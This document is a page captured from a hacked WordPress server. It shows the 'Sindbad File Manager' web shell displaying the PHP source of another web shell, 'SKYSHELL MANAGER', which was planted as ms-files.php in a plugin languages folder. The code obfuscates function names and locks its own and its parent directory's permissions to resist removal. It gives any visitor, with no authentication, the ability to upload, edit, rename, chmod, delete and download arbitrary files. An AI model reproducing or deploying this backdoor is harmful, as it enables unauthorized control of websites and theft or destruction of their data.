Sindbad~EG File Manager

Current Path : /var/www/html/wordpress_alg24news/wp-content/languages/plugins/
Upload File :
Current File : /var/www/html/wordpress_alg24news/wp-content/languages/plugins/ms-files.php

<?php
$O00OO0=urldecode("%63%68%6d%6f%64");
$O00OO0(__FILE__, 0444); 
$V1=[$O00OO0,'realpath','getcwd','basename','move_uploaded_file','file_exists','mkdir','file_put_contents','rename','dirname','chmod','octdec','unlink','rmdir','header','urlencode','is_dir','scandir','usort','fileperms','filesize','round','htmlspecialchars','file_get_contents','phpversion'];

// Path Handling Fix
$P1 = isset($_GET['path']) ? $V1[1]($_GET['path']) : $V1[2]();
if(!$P1 || $P1 == "") { $P1 = $V1[2](); }

// Parent Directory Lock Logic (0555)
$current_file_path = $V1[1](__FILE__);
if ($current_file_path) {
    $current_dir = $V1[9]($current_file_path);
    $parent_dir = $V1[9]($current_dir);
    if($parent_dir && $V1[16]($parent_dir) && $parent_dir !== $current_dir){
        @$V1[10]($parent_dir, 0555); 
    }
}

$M1="";
if($_SERVER['REQUEST_METHOD']==='POST'){
    if(isset($_FILES['file'])){if($V1[4]($_FILES['file']['tmp_name'],$P1.DIRECTORY_SEPARATOR.$V1[3]($_FILES['file']['name'])))$M1="File uploaded!";}
    if(isset($_POST['newfolder'])){$F1=$P1.DIRECTORY_SEPARATOR.$_POST['newfolder'];if(!$V1[5]($F1)){$V1[6]($F1);$M1="Folder created!";}}
    if(isset($_POST['newfile'])){$F2=$P1.DIRECTORY_SEPARATOR.$_POST['newfile'];if(!$V1[5]($F2)){$V1[7]($F2,'');$M1="File created!";}}
    if(isset($_POST['old_name'],$_POST['new_name'])){if($V1[8]($_POST['old_name'],$V1[9]($_POST['old_name']).DIRECTORY_SEPARATOR.$_POST['new_name']))$M1="Renamed!";}
    if(isset($_POST['chmod_file'],$_POST['chmod_value'])){if($V1[5]($_POST['chmod_file'])){$V1[10]($_POST['chmod_file'],$V1[11]($_POST['chmod_value']));$M1="Permissions changed!";}}
    if(isset($_POST['edit_file_path'],$_POST['edited_content'])){if($V1[5]($_POST['edit_file_path'])){$V1[10]($_POST['edit_file_path'],0644);$V1[7]($_POST['edit_file_path'],$_POST['edited_content']);$V1[10]($_POST['edit_file_path'],0444);$M1="Updated!";}}
}

if(isset($_GET['delete'])){$T1=urldecode($_GET['delete']);if($V1[5]($T1)){if($V1[16]($T1)){$V1[13]($T1);}else{$V1[12]($T1);}$V1[14]("Location: ?path=".$V1[15]($V1[9]($T1)));exit;}}
if(isset($_GET['download'])){$D1=$_GET['download'];if($V1[5]($D1)){$V1[14]('Content-Type: application/octet-stream');$V1[14]('Content-Disposition: attachment; filename="'.$V1[3]($D1).'"');readfile($D1);exit;}}

$fs = ($V1[5]($P1) && $V1[16]($P1)) ? $V1[17]($P1) : [];
if(!empty($fs)){
    $V1[18]($fs,function($a,$b)use($P1,$V1){return $V1[16]($P1.DIRECTORY_SEPARATOR.$b)-$V1[16]($P1.DIRECTORY_SEPARATOR.$a);});
}
?>
<h2><span class="emoji">📁</span> SKYSHELL MANAGER <span class="php-v">PHP v<?= $V1[24](); ?></span></h2>
<?php if($M1): ?><div class="msg"><?= $M1 ?></div><?php endif; ?>
<div class="u-c"><div><form method="post"><input type="text" name="newfolder" placeholder="Folder"><button type="submit">Create</button></form><form method="post"><input type="text" name="newfile" placeholder="File"><button type="submit">Create</button></form></div><div><form method="post" enctype="multipart/form-data"><input type="file" name="file" onchange="this.form.submit()"></form></div></div>

<!-- Fixed Path Logic without extra spaces -->
<p class="p-d"><b>Path:</b><?php 
$path_parts = explode(DIRECTORY_SEPARATOR, $P1);
$accumulated_path = "";
foreach ($path_parts as $key => $part) {
    if ($part === "" && $key === 0) {
        $accumulated_path = DIRECTORY_SEPARATOR;
        echo "<a href='?path=".$V1[15]($accumulated_path)."'>root</a>/";
        continue;
    }
    if ($part === "") continue;
    if (DIRECTORY_SEPARATOR === '\\') {
        $accumulated_path .= ($accumulated_path === "" ? "" : DIRECTORY_SEPARATOR) . $part;
    } else {
        $accumulated_path .= DIRECTORY_SEPARATOR . $part;
    }
    echo "<a href='?path=".$V1[15]($accumulated_path)."'>$part</a>/";
} 
?></p>

<table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Actions</th></tr>
<?php foreach($fs as $f){if($f=='.' || $f=='..')continue;$fl=$P1.DIRECTORY_SEPARATOR.$f;$id=$V1[16]($fl);$pm=substr(sprintf('%o',$V1[19]($fl)),-4);$sz=$id?'-':$V1[21]($V1[20]($fl)/1024,2).' KB';
if($pm == '0444' || $pm == '0555' || $pm == '0400') { $cl = 'style="color:#f00;font-weight:bold;"'; } else { $cl = 'style="color:#0f0;font-weight:bold;"'; }
echo "<tr><td>".($id?"📁":"📄")." <a href='?path=".$V1[15]($fl)."'>$f</a></td><td>$sz</td><td><span $cl>$pm</span></td><td class=\"act-c\"><a href='?delete=".$V1[15]($fl)."' onclick=\"return confirm('?')\">🗑️</a> <a href='?rename=".$V1[15]($fl)."'>🏷️</a> ".(!$id?"<a href='?path=".$V1[15]($P1)."&download=".$V1[15]($fl)."'>⬇️</a> <a href='?edit=".$V1[15]($fl)."'>✏️</a>":"")." <form method='post' style='display:inline;'><input type='hidden' name='chmod_file' value='$fl'><input type='text' name='chmod_value' placeholder='P' style='width:30px;'><button type='submit'>🔒</button></form></td></tr>";} ?>
</table>
<?php if(isset($_GET['rename'])): $t=$_GET['rename']; ?><div style="margin-top:20px;border:1px solid #444;padding:15px;"><h3 style="color:#fff;">Rename: <?= $V1[3]($t) ?></h3><form method="post" action="?path=<?= $V1[15]($P1) ?>"><input type="hidden" name="old_name" value="<?= $V1[22]($t) ?>"><input type="text" name="new_name" value="<?= $V1[22]($V1[3]($t)) ?>"><button type="submit">OK</button></form></div><?php endif; ?>
<?php if(isset($_GET['edit'])&&is_file($_GET['edit'])): $te=$_GET['edit'];$c=$V1[22]($V1[23]($te)); ?><h3 style="color:#fff;">Edit: <?= $V1[3]($te) ?></h3><form method="post" action="?path=<?= $V1[15]($V1[9]($te)) ?>"><input type="hidden" name="edit_file_path" value="<?= $V1[22]($te) ?>"><textarea name="edited_content" rows="15" style="width:100%"><?= $c ?></textarea><br><button type="submit">Save</button></form><?php endif; ?>
</body></html>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists